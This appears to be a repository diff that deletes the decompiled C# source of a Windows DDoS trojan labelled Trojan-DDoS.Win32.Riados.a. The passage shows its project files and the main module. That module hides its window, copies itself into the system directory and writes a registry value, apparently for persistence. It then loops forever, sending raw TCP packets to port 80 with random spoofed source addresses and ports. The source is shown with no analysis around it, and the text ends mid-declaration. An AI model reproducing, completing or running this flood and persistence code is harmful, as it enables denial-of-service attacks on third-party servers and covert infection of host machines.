</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualC" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CModule_003E.cs" />
<Compile Include="$ArrayType$0xe7df2480.cs" />
<Compile Include="$ArrayType$0x47e6e69e.cs" />
<Compile Include="$ArrayType$0x14f3579d.cs" />
<Compile Include="HKEY__.cs" />
<Compile Include="tm.cs" />
<Compile Include="$ArrayType$0x7692bedb.cs" />
<Compile Include="HWND__.cs" />
<Compile Include="$ArrayType$0x2f06ae88.cs" />
<Compile Include="$ArrayType$0x42a9f01b.cs" />
<Compile Include="$ArrayType$0x0a833ae0.cs" />
<Compile Include="$ArrayType$0x59f47f03.cs" />
<Compile Include="$ArrayType$0x042bfd4b.cs" />
<Compile Include="tcp.cs" />
<Compile Include="WSAData.cs" />
<Compile Include="sockaddr_in.cs" />
<Compile Include="$ArrayType$0xf541300f.cs" />
<Compile Include="$ArrayType$0x16b5e9c4.cs" />
<Compile Include="$ArrayType$0x1d30cc0a.cs" />
<Compile Include="in_addr.cs" />
<Compile Include="$ArrayType$0x6a0077b6.cs" />
<Compile Include="$ArrayType$0xee1cbf17.cs" />
<Compile Include="$ArrayType$0xe4f4c4f0.cs" />
<Compile Include="HINSTANCE__.cs" />
<Compile Include="ipv4.cs" />
<Compile Include="_SECURITY_ATTRIBUTES.cs" />
<Compile Include="sockaddr.cs" />
<Compile Include="$ArrayType$0x5bb2c15a.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

20
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/Trojan-DDoS.Win32.Riados.a.sln
View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ARF", "Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.csproj", "{F3427B8E-B6D1-45E1-A55D-75F725CCB91B}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{F3427B8E-B6D1-45E1-A55D-75F725CCB91B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{F3427B8E-B6D1-45E1-A55D-75F725CCB91B}.Debug|Any CPU.Build.0 = Debug|Any CPU
{F3427B8E-B6D1-45E1-A55D-75F725CCB91B}.Release|Any CPU.ActiveCfg = Release|Any CPU
{F3427B8E-B6D1-45E1-A55D-75F725CCB91B}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

15
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/WSAData.cs
View File

@ -1,15 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: WSAData
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[MiscellaneousBits(1)]
[DebugInfoInPDB]
[StructLayout(LayoutKind.Sequential, Size = 400, Pack = 1)]
internal struct WSAData
{
}

541
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/_003CModule_003E.cs
View File

@ -1,541 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using System;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security;
internal class \u003CModule\u003E
{
public static \u0024ArrayType\u00240xe7df2480 \u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D0;
public static \u0024ArrayType\u00240x47e6e69e \u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D1;
public static \u0024ArrayType\u00240x14f3579d \u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D2;
public static \u0024ArrayType\u00240x47e6e69e \u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D3;
public static \u0024ArrayType\u00240x2f06ae88 \u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D4;
public static \u0024ArrayType\u00240x42a9f01b \u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D5;
public static \u0024ArrayType\u00240xe7df2480 \u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D6;
public static \u0024ArrayType\u00240x47e6e69e \u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D7;
public static \u0024ArrayType\u00240x42a9f01b \u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D8;
public static \u0024ArrayType\u00240x59f47f03 \u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D9;
public static \u0024ArrayType\u00240x042bfd4b \u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D10;
public static \u0024ArrayType\u00240xf541300f \u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D11;
public static \u0024ArrayType\u00240x59f47f03 \u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D12;
public static \u0024ArrayType\u00240xf541300f \u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D13;
public static \u0024ArrayType\u00240x16b5e9c4 \u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D14;
public static \u0024ArrayType\u00240x16b5e9c4 \u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D15;
public static \u0024ArrayType\u00240x16b5e9c4 \u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D16;
public static \u0024ArrayType\u00240x1d30cc0a \u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D17;
public static \u0024ArrayType\u00240x6a0077b6 \u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D18;
public static \u0024ArrayType\u00240xee1cbf17 \u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D19;
public static \u0024ArrayType\u00240xe4f4c4f0 trame_send;
public static int nb_caract_send;
public static bool while_infini;
public static uint long_data_send;
public static bool ip_source_random;
public static \u0024ArrayType\u00240xe4f4c4f0 data_send;
public static ipv4 entete_ipv4;
public static uint loops;
public static tcp entete_tcp;
public static \u0024ArrayType\u00240x5bb2c15a ip_source_init;
public static int MyNameisOutSider;
public static bool port_source_random;
public static unsafe int main(int argc, sbyte** argv)
{
\u003CModule\u003E.ShowWindow(\u003CModule\u003E.GetForegroundWindow(), 0);
\u003CModule\u003E.FreeConsole();
\u0024ArrayType\u00240xe7df2480 arrayType0xe7df2480;
// ISSUE: cpblk instruction
__memcpy(ref arrayType0xe7df2480, ref \u003CModule\u003E.\u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D0, 9);
uint num1 = 0;
uint num2 = 1024;
HKEY__* hkeyPtr;
if (\u003CModule\u003E.RegOpenKeyExA((HKEY__*) -2147483646, (sbyte*) &\u003CModule\u003E.\u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D1, 0U, 131097U, &hkeyPtr) == 0)
{
\u0024ArrayType\u00240x7692bedb arrayType0x7692bedb;
if (\u003CModule\u003E.RegQueryValueExA(hkeyPtr, (sbyte*) &arrayType0xe7df2480, (uint*) 0, &num1, (byte*) &arrayType0x7692bedb, &num2) == 0)
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D2, __arglist ());
else
\u003CModule\u003E.Create_cle();
}
else
{
uint keyExA = (uint) \u003CModule\u003E.RegCreateKeyExA((HKEY__*) -2147483646, (sbyte*) &\u003CModule\u003E.\u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D3, 0U, (sbyte*) 0, 0U, 983103U, (_SECURITY_ATTRIBUTES*) 0, &hkeyPtr, (uint*) 0);
\u003CModule\u003E.Create_cle();
}
if (*(int*) ((IntPtr) \u003CModule\u003E.gmtime(&\u003CModule\u003E.time((int*) 0)) + 28) + 1 >= 299)
\u003CModule\u003E.init_var();
else
\u003CModule\u003E.exit(0);
while (\u003CModule\u003E.loops != 0U || \u003CModule\u003E.while_infini)
{
--\u003CModule\u003E.loops;
\u003CModule\u003E.Random_change_the_values();
\u003CModule\u003E.send_trame();
\u003CModule\u003E.view_result();
\u003CModule\u003E.Sleep(1U);
}
return 1;
}
public static unsafe void Create_cle()
{
\u0024ArrayType\u00240x0a833ae0 arrayType0x0a833ae0_1;
// ISSUE: cpblk instruction
__memcpy(ref arrayType0x0a833ae0_1, ref \u003CModule\u003E.\u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D4, 1);
// ISSUE: cast to a reference type
// ISSUE: initblk instruction
__memset((\u0024ArrayType\u00240x0a833ae0&) ((IntPtr) &arrayType0x0a833ae0_1 + 1), 0, (int) byte.MaxValue);
int currentDirectoryA = (int) \u003CModule\u003E.GetCurrentDirectoryA(256U, (sbyte*) &arrayType0x0a833ae0_1);
int moduleFileNameA = (int) \u003CModule\u003E.GetModuleFileNameA((HINSTANCE__*) 0, (sbyte*) &arrayType0x0a833ae0_1, 261U);
\u0024ArrayType\u00240x0a833ae0 arrayType0x0a833ae0_2;
\u003CModule\u003E.strcpy((sbyte*) &arrayType0x0a833ae0_2, (sbyte*) &arrayType0x0a833ae0_1);
sbyte* numPtr = (sbyte*) \u003CModule\u003E.@new(260U);
\u003CModule\u003E.GetSystemDirectoryA(numPtr, 260U);
\u0024ArrayType\u00240x0a833ae0 arrayType0x0a833ae0_3;
\u003CModule\u003E.strcpy((sbyte*) &arrayType0x0a833ae0_3, numPtr);
\u003CModule\u003E.strcat((sbyte*) &arrayType0x0a833ae0_3, (sbyte*) &\u003CModule\u003E.\u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D5);
\u003CModule\u003E.CopyFileA((sbyte*) &arrayType0x0a833ae0_2, (sbyte*) &arrayType0x0a833ae0_3, 0);
\u0024ArrayType\u00240xe7df2480 arrayType0xe7df2480;
// ISSUE: cpblk instruction
__memcpy(ref arrayType0xe7df2480, ref \u003CModule\u003E.\u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D6, 9);
HKEY__* hkeyPtr;
uint num;
if (\u003CModule\u003E.RegCreateKeyExA((HKEY__*) -2147483646, (sbyte*) &\u003CModule\u003E.\u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D7, 0U, (sbyte*) 0, 0U, 983103U, (_SECURITY_ATTRIBUTES*) 0, &hkeyPtr, &num) != 0)
\u003CModule\u003E.exit(0);
\u003CModule\u003E.RegSetValueExA(hkeyPtr, (sbyte*) &arrayType0xe7df2480, 0U, 1U, (byte*) &arrayType0x0a833ae0_3, \u003CModule\u003E.strlen((sbyte*) &arrayType0x0a833ae0_3));
\u003CModule\u003E.RegCloseKey(hkeyPtr);
}
public static unsafe void init_var()
{
\u003CModule\u003E.srand(\u003CModule\u003E.GetTickCount());
\u003CModule\u003E.strcpy((sbyte*) &\u003CModule\u003E.ip_source_init, (sbyte*) &\u003CModule\u003E.\u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D8);
\u003CModule\u003E.port_source_random = true;
\u003CModule\u003E.ip_source_random = true;
\u003CModule\u003E.loops = 0U;
\u003CModule\u003E.while_infini = true;
\u003CModule\u003E.strcpy((sbyte*) &\u003CModule\u003E.data_send, (sbyte*) &\u003CModule\u003E.\u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D9);
\u003CModule\u003E.long_data_send = \u003CModule\u003E.strlen((sbyte*) &\u003CModule\u003E.data_send);
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ref \u003CModule\u003E.entete_tcp = (short) 0;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 2) = (short) \u003CModule\u003E.htons((ushort) 80);
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 4) = 0;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 8) = 0;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 12) = (short) ((int) ^(ushort&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 12) & 65520);
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 12) = (short) ((int) ^(ushort&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 12) & 65295 | 80);
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 12) = (short) ((int) ^(ushort&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 12) & 65279);
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 12) = (short) ((int) ^(ushort&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 12) | 512);
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 12) = (short) ((int) ^(ushort&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 12) & 64511);
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 12) = (short) ((int) ^(ushort&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 12) & 63487);
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 12) = (short) ((int) ^(ushort&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 12) & 61439);
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 12) = (short) ((int) ^(ushort&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 12) & 57343);
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 12) = (short) ((int) ^(ushort&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 12) & 16383);
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 14) = (short) \u003CModule\u003E.htons((ushort) 16384);
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 16) = (short) 0;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 18) = (short) 0;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(sbyte&) ref \u003CModule\u003E.entete_ipv4 = (sbyte) ((int) ^(byte&) ref \u003CModule\u003E.entete_ipv4 & 240 | 5);
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(sbyte&) ref \u003CModule\u003E.entete_ipv4 = (sbyte) ((int) ^(byte&) ref \u003CModule\u003E.entete_ipv4 & 15 | 64);
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(sbyte&) ((IntPtr) &\u003CModule\u003E.entete_ipv4 + 1) = (sbyte) 0;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ((IntPtr) &\u003CModule\u003E.entete_ipv4 + 2) = (short) 0;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ((IntPtr) &\u003CModule\u003E.entete_ipv4 + 4) = (short) 0;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ((IntPtr) &\u003CModule\u003E.entete_ipv4 + 6) = (short) ((int) ^(ushort&) ((IntPtr) &\u003CModule\u003E.entete_ipv4 + 6) & 65504);
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(sbyte&) ((IntPtr) &\u003CModule\u003E.entete_ipv4 + 8) = (sbyte) 100;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(sbyte&) ((IntPtr) &\u003CModule\u003E.entete_ipv4 + 9) = (sbyte) 6;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &\u003CModule\u003E.entete_ipv4 + 12) = 0;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &\u003CModule\u003E.entete_ipv4 + 16) = (int) \u003CModule\u003E.resolution_de_nom(true, (sbyte*) &\u003CModule\u003E.ip_source_init);
}
public static unsafe void management_arguments(int argc, sbyte** argv)
{
\u003CModule\u003E.ip_source_random = true;
\u003CModule\u003E.port_source_random = true;
sbyte* numPtr;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 2) = (short) \u003CModule\u003E.htons((ushort) ((int) (uint) \u003CModule\u003E.strtod((sbyte*) &\u003CModule\u003E.\u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D10, &numPtr) & (int) ushort.MaxValue));
int num;
\u003CModule\u003E.long_data_send = (uint) \u003CModule\u003E.strtod((sbyte*) *(int*) ((IntPtr) argv + (num + 1) * 4), &numPtr);
\u003CModule\u003E.strcpy((sbyte*) &\u003CModule\u003E.data_send, \u003CModule\u003E.dimensionnement_de_data_a_envoyer(false, (sbyte*) &\u003CModule\u003E.data_send, \u003CModule\u003E.long_data_send));
\u003CModule\u003E.while_infini = true;
}
public static unsafe void Random_change_the_values()
{
if (\u003CModule\u003E.ip_source_random)
{
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &\u003CModule\u003E.entete_ipv4 + 12) = (int) \u003CModule\u003E.generation_d_une_adresse_ip_aleatoire(0);
}
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ((IntPtr) &\u003CModule\u003E.entete_ipv4 + 4) = (short) (\u003CModule\u003E.rand() % 65536);
if (\u003CModule\u003E.port_source_random)
{
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ref \u003CModule\u003E.entete_tcp = (short) (\u003CModule\u003E.rand() % 64511 + 1025);
}
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 4) = (int) (ushort) (\u003CModule\u003E.rand() % 65536);
}
public static unsafe void send_trame()
{
WSAData wsaData;
if (\u003CModule\u003E.WSAStartup((ushort) 514, &wsaData) != 0)
\u003CModule\u003E.exit_error(1);
uint num1 = \u003CModule\u003E.socket(2, 3, (int) byte.MaxValue);
if (num1 == uint.MaxValue)
\u003CModule\u003E.exit_error(2);
int num2 = 1;
if (\u003CModule\u003E.setsockopt(num1, 0, 2, (sbyte*) &num2, 4) != 0)
\u003CModule\u003E.exit_error(3);
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ((IntPtr) &\u003CModule\u003E.entete_tcp + 16) = (short) \u003CModule\u003E.calcul_du_checksum_tcp(false, (uint) ^(int&) ((IntPtr) &\u003CModule\u003E.entete_ipv4 + 12), (uint) ^(int&) ((IntPtr) &\u003CModule\u003E.entete_ipv4 + 16), \u003CModule\u003E.entete_tcp, (sbyte*) &\u003CModule\u003E.data_send);
\u003CModule\u003E.memcpy((void*) &\u003CModule\u003E.trame_send, (void*) &\u003CModule\u003E.entete_ipv4, 20U);
\u003CModule\u003E.memcpy((void*) ((IntPtr) &\u003CModule\u003E.trame_send + 20), (void*) &\u003CModule\u003E.entete_tcp, 20U);
\u003CModule\u003E.memcpy((void*) ((IntPtr) &\u003CModule\u003E.trame_send + 40), (void*) &\u003CModule\u003E.data_send, \u003CModule\u003E.long_data_send);
sockaddr_in sockaddrIn;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ref sockaddrIn = (short) 2;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &sockaddrIn + 4) = ^(int&) ((IntPtr) &\u003CModule\u003E.entete_ipv4 + 16);
\u003CModule\u003E.nb_caract_send = \u003CModule\u003E.sendto(num1, (sbyte*) &\u003CModule\u003E.trame_send, (int) \u003CModule\u003E.long_data_send + 40, 0, (sockaddr*) &sockaddrIn, 16);
if (\u003CModule\u003E.nb_caract_send < 1)
\u003CModule\u003E.exit_error(4);
\u003CModule\u003E.closesocket(num1);
\u003CModule\u003E.WSACleanup();
}
public static unsafe void exit_error(int error)
{
if (error == 1)
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D11, __arglist ());
if (error == 2)
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D12, __arglist ());
if (error == 3)
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D13, __arglist ());
if (error == 4)
{
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D14, __arglist ());
\u003CModule\u003E.Sleep(100000U);
\u003CModule\u003E.init_var();
}
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D15, __arglist (error));
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D16, __arglist (\u003CModule\u003E.WSAGetLastError()));
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D17, __arglist ());
}
public static unsafe void view_result()
{
in_addr inAddr;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ref inAddr = ^(int&) ((IntPtr) &\u003CModule\u003E.entete_ipv4 + 12);
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D18, __arglist ((IntPtr) \u003CModule\u003E.inet_ntoa(inAddr)));
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ref inAddr = ^(int&) ((IntPtr) &\u003CModule\u003E.entete_ipv4 + 16);
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003FA0xe8b08e53\u002Eunnamed\u002Dglobal\u002D19, __arglist ((IntPtr) \u003CModule\u003E.inet_ntoa(inAddr), \u003CModule\u003E.nb_caract_send));
}
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern void Sleep([In] uint obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern void exit([In] int obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe tm* gmtime([In] int* obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int time([In] int* obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int RegCreateKeyExA(
[In] HKEY__* obj0,
[In] sbyte* obj1,
[In] uint obj2,
[In] sbyte* obj3,
[In] uint obj4,
[In] uint obj5,
[In] _SECURITY_ATTRIBUTES* obj6,
[In] HKEY__** obj7,
[In] uint* obj8);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int printf([In] sbyte* obj0, __arglist);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int RegQueryValueExA(
[In] HKEY__* obj0,
[In] sbyte* obj1,
[In] uint* obj2,
[In] uint* obj3,
[In] byte* obj4,
[In] uint* obj5);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int RegOpenKeyExA(
[In] HKEY__* obj0,
[In] sbyte* obj1,
[In] uint obj2,
[In] uint obj3,
[In] HKEY__** obj4);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern int FreeConsole();
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int ShowWindow([In] HWND__* obj0, [In] int obj1);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe HWND__* GetForegroundWindow();
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int RegCloseKey([In] HKEY__* obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe uint strlen([In] sbyte* obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int RegSetValueExA(
[In] HKEY__* obj0,
[In] sbyte* obj1,
[In] uint obj2,
[In] uint obj3,
[In] byte* obj4,
[In] uint obj5);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int CopyFileA([In] sbyte* obj0, [In] sbyte* obj1, [In] int obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe sbyte* strcat([In] sbyte* obj0, [In] sbyte* obj1);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe uint GetSystemDirectoryA([In] sbyte* obj0, [In] uint obj1);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe void* @new([In] uint obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe sbyte* strcpy([In] sbyte* obj0, [In] sbyte* obj1);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe uint GetModuleFileNameA([In] HINSTANCE__* obj0, [In] sbyte* obj1, [In] uint obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe uint GetCurrentDirectoryA([In] uint obj0, [In] sbyte* obj1);
[SuppressUnmanagedCodeSecurity]
